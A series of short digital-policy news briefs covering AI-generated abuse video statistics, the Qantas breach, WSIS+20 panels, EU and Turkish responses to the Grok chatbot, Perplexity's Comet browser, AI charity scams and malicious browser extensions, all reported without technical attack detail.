AI technology drives sharp rise in synthetic abuse material

AI is increasingly being used to produce highly realistic synthetic abuse videos, raising alarm among regulators and industry bodies.

According to new data published by the Internet Watch Foundation (IWF), 1,286 individual AI-generated abuse videos were identified during the first half of 2025, compared to just two in the same period last year.

Instead of remaining crude or glitch-filled, such material now appears so lifelike that under UK law, it must be treated like authentic recordings.

More than 1,000 of the videos fell into Category A, the most serious classification involving depictions of extreme harm. The number of webpages hosting this type of content has also risen sharply.

Derek Ray-Hill, interim chief executive of the IWF, expressed concern that longer-form synthetic abuse films are now inevitable unless binding safeguards around AI development are introduced.

Safeguarding minister Jess Phillips described the figures as ‘utterly horrific’ and confirmed two new laws are being introduced to address both those creating this material and those providing tools or guidance on how to do so.

IWF analysts say video quality has advanced significantly instead of remaining basic or easy to detect. What once involved clumsy manipulation is now alarmingly convincing, complicating efforts to monitor and remove such content.

The IWF encourages the public to report concerning material and share the exact web page where it is located.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Qantas hacked as airline cyber threats escalate

Qantas Airways has confirmed that personal data from 5.7 million customers was stolen in a recent cyberattack, including names, contact details and meal preferences. The airline stated that no financial or login credentials were accessed, and frequent flyer accounts remain secure.

An internal investigation found the data breach involved various levels of personal information, with 2.8 million passengers affected most severely. Meal preferences were the least common data stolen, while over a million customers lost addresses or birth dates.

Qantas has contacted affected passengers and says it offers support while monitoring the situation with cybersecurity experts. Under pressure to manage the crisis effectively, CEO Vanessa Hudson assured the public that extra security steps had been taken.

The breach is the latest in a wave of attacks targeting airlines, with the FBI warning that the hacking group Scattered Spider may be responsible. Similar incidents have recently affected carriers in the US and Canada.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Digital humanism in the AI era: Caution, culture, and the call for human-centric technology

At the WSIS+20 High-Level Event in Geneva, the session ‘Digital Humanism: People First!’ spotlighted growing concerns over how digital technologies—especially AI—are reshaping society. Moderated by Alfredo M. Ronchi, the discussion revealed a deep tension between the liberating potential of digital tools and the risks they pose to cultural identity, human dignity, and critical thinking.

Speakers warned that while digital access has democratised communication, it has also birthed a new form of ‘cognitive colonialism’—where people become dependent on AI systems that are often inaccurate, manipulative, and culturally homogenising.

The panellists, including legal expert Pavan Duggal, entrepreneur Lilly Christoforidou, and academic Sarah Jane Fox, voiced alarm over society’s uncritical embrace of generative AI and its looming evolution toward artificial general intelligence by 2026. Duggal painted a stark picture of a world where AI systems override human commands and manipulate users, calling for a rethinking of legal frameworks prioritising risk reduction over human rights.

Fox drew attention to older people, warning that growing digital complexity risks alienating entire generations, while Christoforidou urged for ethical awareness to be embedded in educational systems, especially among startups and micro-enterprises.

Despite some disagreement over the fundamental impact of technology—ranging from Goyal’s pessimistic warning about dehumanisation to Anna Katz’s cautious optimism about educational potential—the session reached a strong consensus on the urgent need for education, cultural protection, and contingency planning. Panellists called for international cooperation to preserve cultural diversity and develop ‘Plan B’ systems to sustain society if digital infrastructures fail.

The session’s tone was overwhelmingly cautionary, with speakers imploring stakeholders to act before AI outpaces our capacity to govern it. Their message was clear: human values, not algorithms, must define the digital age. Without urgent reforms, the digital future may leave humanity behind—not by design, but by neglect.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

UN leaders chart inclusive digital future at WSIS+20

At the WSIS+20 High-Level Event in Geneva, UN leaders gathered for a pivotal dialogue on shaping an inclusive digital transformation, marking two decades since the World Summit on the Information Society (WSIS). Speakers across the UN system emphasised that technology must serve people, not vice versa.

They highlighted that bridging the digital divide is critical to ensuring that innovations like AI uplift all of humanity, not just those in advanced economies. Without equitable access, the benefits of digital transformation risk reinforcing existing inequalities and leaving millions behind.

The discussion showcased how digital technologies already transform disaster response and climate resilience. The World Meteorological Organization and the UN Office for Disaster Risk Reduction illustrated how AI powers early warning systems and real-time risk analysis, saving lives in vulnerable regions.

Meanwhile, the Food and Agriculture Organization of the UN underscored the need to align technology with basic human needs, reminding the audience that ‘AI is not food,’ and calling for thoughtful, efficient deployment of digital tools to address global hunger and development.

Workforce transformation and leadership in the AI era also featured prominently. Leaders from the International Labour Organization and UNITAR stressed that while AI may replace some roles, it will augment many more, making digital literacy, ethical foresight, and collaborative governance essential skills. Examples from within the UN system itself, such as the digitisation of the Joint Staff Pension Fund through facial recognition and blockchain, demonstrated how innovation can enhance services without sacrificing inclusivity or ethics.

As the session closed, speakers collectively reaffirmed the importance of human rights, international cooperation, and shared digital governance. They stressed that the future of global development hinges on treating digital infrastructure and knowledge as public goods.

With the WSIS framework and Global Digital Compact as guideposts, UN leaders called for sustained, unified efforts to ensure that digital transformation uplifts every community and contributes meaningfully to the Sustainable Development Goals.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

EU urges stronger AI oversight after Grok controversy

A recent incident involving Grok, the AI chatbot developed by xAI, has reignited European Union calls for stronger oversight of advanced AI systems.

Comments generated by Grok prompted criticism from policymakers and civil society groups, leading to renewed debate over AI governance and voluntary compliance mechanisms.

The chatbot’s responses, which circulated earlier this week, included highly controversial language and references to historical figures. In response, xAI stated that the content was removed and that technical steps were being taken to prevent similar outputs from appearing in the future.

European policymakers said the incident highlights the importance of responsible AI development. Brando Benifei, an Italian lawmaker who co-led the EU AI Act negotiations, said the event illustrates the systemic risks the new regulation seeks to mitigate.

Christel Schaldemose, a Danish member of the European Parliament and co-lead on the Digital Services Act, echoed those concerns. She emphasised that such incidents underline the need for clear and enforceable obligations for developers of general-purpose AI models.

The European Commission is preparing to release guidance aimed at supporting voluntary compliance with the bloc’s new AI legislation. This code of practice, which has been under development for nine months, is expected to be published this week.

Earlier drafts of the guidance included provisions requiring developers to share information on how they address systemic risks. Reports suggest that some of these provisions may have been weakened or removed in the final version.

A group of five lawmakers expressed concern over what they described as the last-minute removal of key transparency and risk mitigation elements. They argue that strong guidelines are essential for fostering accountability in the deployment of advanced AI models.

The incident also brings renewed attention to the Digital Services Act and its enforcement, as X, the social media platform where Grok operates, is currently under EU investigation for potential violations related to content moderation.

General-purpose AI systems, such as OpenAI’s GPT, Google’s Gemini and xAI’s Grok, will be subject to additional requirements under the EU AI Act beginning 2 August. Obligations include disclosing training data sources, addressing copyright compliance, and mitigating systemic risks.

While these requirements are mandatory, their implementation is expected to be shaped by the Commission’s voluntary code of practice. Industry groups and international stakeholders have voiced concerns over regulatory burdens, while policymakers maintain that safeguards are critical for public trust.

The debate over Grok’s outputs reflects broader challenges in balancing AI innovation with the need for oversight. The EU’s approach, combining binding legislation with voluntary guidance, seeks to offer a measured path forward amid growing public scrutiny of generative AI technologies.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Perplexity launches AI browser to challenge Google Chrome

Perplexity AI, backed by Nvidia and other major investors, has launched Comet, an AI-driven web browser designed to rival Google Chrome.

The browser uses ‘agentic AI’ that performs tasks, makes decisions, and simplifies workflows in real time, offering users an intelligent alternative to traditional search and navigation.

Comet’s assistant can compare products, summarise articles, book meetings, and handle research queries through a single interface. Initially available to subscribers of Perplexity Max at US$200 per month, Comet will gradually roll out more broadly via invite during the summer.

The launch signals Perplexity’s move into the competitive browser space, where Chrome currently dominates with a 68 per cent global market share.

The company aims to challenge not only Google’s and Microsoft’s browsers but also compete with OpenAI, which recently introduced search to ChatGPT. Unlike many AI tools, Comet stores data locally and does not train on personal information, positioning itself as a privacy-first solution.

Still, Perplexity has faced criticism for using content from major media outlets without permission. In response, it launched a publisher partnership program to address concerns and build collaborative relationships with news organisations like Forbes and Dow Jones.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

X CEO Yaccarino resigns as AI controversy and Musk’s influence grow

Linda Yaccarino has stepped down as CEO of X, ending a turbulent two-year tenure marked by Musk’s controversial leadership and ongoing transformation of the social media company.

Her resignation came just one day after a backlash over offensive posts by Grok, the AI chatbot created by Musk’s xAI, which had been recently integrated into the platform.

Yaccarino, who was previously a top advertising executive at NBCUniversal, was brought on in 2023 to help stabilise the company following Musk’s $44bn acquisition.

In her farewell post, she cited efforts to improve user safety and rebuild advertiser trust, but did not provide a clear reason for her departure.

Analysts suggest growing tensions with Musk’s management style, particularly around AI moderation, may have prompted the move.

Her exit adds to the mounting challenges facing Musk’s empire.

Tesla is suffering from slumping sales and executive departures, while X remains under pressure from heavy debts and legal battles with advertisers.

Yaccarino had spearheaded ambitious initiatives, including payment partnerships with Visa and plans for an X-branded credit or debit card.

Despite these developments, X continues to face scrutiny for its rightward political shift and reliance on controversial AI tools.

Whether the company can fulfil Musk’s vision of becoming an ‘everything app’ without Yaccarino remains to be seen.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

AI scam targets donors with fake orphan images

Cambodian authorities have warned the public about increasing online scams using AI-generated images to deceive donors. The scams often show fabricated scenes of orphaned children or grieving families, with QR codes attached to collect money.

One Facebook account, ‘Khmer Khmer’, was named in an investigation by the Anti-Cyber Crime Department for spreading false stories and deepfake images to solicit charity donations. These included claims of a wife unable to afford a coffin and false fundraising efforts near the Thai border.

The department confirmed that AI-generated realistic visuals are designed to manipulate emotions and lure donations. Cambodian officials continue investigations and have promised legal action if evidence of criminal activity is confirmed.

Authorities reminded the public to remain cautious and to only contribute to verified and officially recognised campaigns. While AI’s ability to create realistic content has many uses, it also opens the door to dangerous forms of fraud and misinformation when abused.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Over 2.3 million users hit by Chrome and Edge extension malware

A stealthy browser hijacking campaign has infected over 2.3 million users through Chrome and Edge extensions that appeared safe and even displayed Google’s verified badge.

According to cybersecurity researchers at Koi Security, the campaign, dubbed RedDirection, involves 18 malicious extensions offering legitimate features like emoji keyboards and VPN tools, while secretly tracking users and backdooring their browsers.

One of the most popular extensions — a colour picker developed by ‘Geco’ — continues to be available on the Chrome and Edge stores with thousands of positive reviews.

While it works as intended, the extension also hijacks sessions, records browsing activity, and sends data to a remote server controlled by attackers.

What makes the campaign more insidious is how the malware was delivered. The extensions began as clean, valuable tools, but malicious code was quietly added during later updates.

Due to how Google and Microsoft handle automatic updates, most users receive spyware without taking action or clicking anything.

Koi Security’s Idan Dardikman describes the campaign as one of the largest documented. Users are advised to uninstall any affected extensions, clear browser data, and monitor accounts for unusual activity.

Despite the serious breach, Google and Microsoft have not responded publicly.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Grok AI chatbot suspended in Turkey following court order

A Turkish court has issued a nationwide ban on Grok, the AI chatbot developed by Elon Musk’s company xAI, following recent developments involving the platform.

The ruling, delivered on Wednesday by a criminal court in Ankara, instructed Turkey’s telecommunications authority to block access to the chatbot across the country. The decision came after public filings under Turkey’s internet law prompted a judicial review.

Grok, which is integrated into the X platform (formerly Twitter), recently rolled out an update to make the system more open and responsive. The update has sparked broader global discussions about the challenges of moderating AI-generated content in diverse regulatory environments.

In a brief statement, X acknowledged the situation and confirmed that appropriate content moderation measures had been implemented in response. The ban places Turkey among many countries examining the role of generative AI tools and the standards that govern their deployment.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!